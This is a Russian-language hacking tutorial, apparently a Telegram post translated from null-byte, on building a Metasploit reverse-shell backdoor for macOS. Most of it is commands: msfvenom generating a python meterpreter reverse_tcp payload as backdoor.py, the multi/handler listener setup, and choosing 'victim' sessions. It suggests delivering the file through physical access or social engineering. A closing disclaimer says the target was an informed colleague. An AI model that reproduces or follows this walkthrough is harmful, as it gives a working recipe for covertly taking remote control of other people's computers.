Meterpeter on OS X

Meterpeter on OS X

@webware

t.me/webware

На самом деле,тема достаточно старая и заезженная тема, но все таки решил поделиться ей с юными хацкерами, вдруг молодое поколение не знает английский 

 По сути данная статья является переводом другой, взятой с null-byte, с небольшим добавлением информации от меня.


Итак, давайте представим, что у нас есть задача получить временный доступ на таргетированную машину с установленной OS X.

В моих планах было иследование СИ, ну а так же просто спортивный интерес 


Ни для кого не секрет, что Metasploit является одним из сильнейщих инструментом для создания бекдоров.

Собственно говоря его то мы и будем рассматривать.


Первый этап - установка:

sudo pacman -S metasploit


Второй этап - создание нашего бекдорчика и запуск msf

Для начала нам необходимо создать наш файлик , который нужно будет запустить на таргетированной машине. Для этого в нашей консольки введем следующую команду:

msfvenom -p python/meterpreter/reverse_tcp LHOST=*.*.*.* LPORT=**** > backdoor.py

Утилита msfvenom позволяет создать нам payload из обширного "меню"

Для тех кто в танке, payload == полезная нагрузка,руткит, слушатель и тд

Так же мы передаем такие параметры, как LHOST и LPORT.

LHOST является IP машины, куда будет перенапрвляться трафик с машины цели, LPORT - соответсвенно порт.


Теперь самое интересное. Давай-те наконец-то запустим msf.

msfconsole

После запуска - софтинка нас встречает рандомным баннером, что достаточно мило и приятно x)


Третий этап - наконец то получили доступ ^~^


Итак, подготовка нашей рабочей машины:

use multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST *.*.*.*
set LPORT ****
exploit -j -z
Уточню, что lhost и lport должны быть такими же,какие мы указали при создании файла


После этого - мы должны увидеть строчку, которая сообщает нам о том, что мы готовы к соединению

А теперь самое интересное 


У нас есть на руках файлик, у нас есть цель. И что же делать?

Тут два варианта-либо физический доступ к машине , либо СИ.

Это уже Ваше решение, как загрузить файлик на таргет.


Для запуска таргет файла:

python backdoor.py

После успешного запуска на тагрете, в консоли мы сможем увидеть

Если у нас несколько "клиентов" попалось и запуск бекдора был осуществлен на нескольких машинах , мы можем посмотреть список всех жертв, благодаря sessions

Затем- мы выбираем нашу жертву , а точнее выбираем активную сессию sessions -i 3

И все, вуоля!


Мы внутри машины жертвы.

Чтобы убедиться в этом-мы можем использовать getuid

Для дальнейшего изучения возможностей хацкера в машине жертвы, настоятельно рекомендую изучить методы в команде help


Вывод:

В заключении хотелось бы сказать, жертвой являлся мой коллега, который был осведомлен. Ну а так же не злоупотребляйте хаками и помните, что карма все запоминает ^~^


Всем спасибо за внимание, жду критики )

Источник codeby.net

Report Page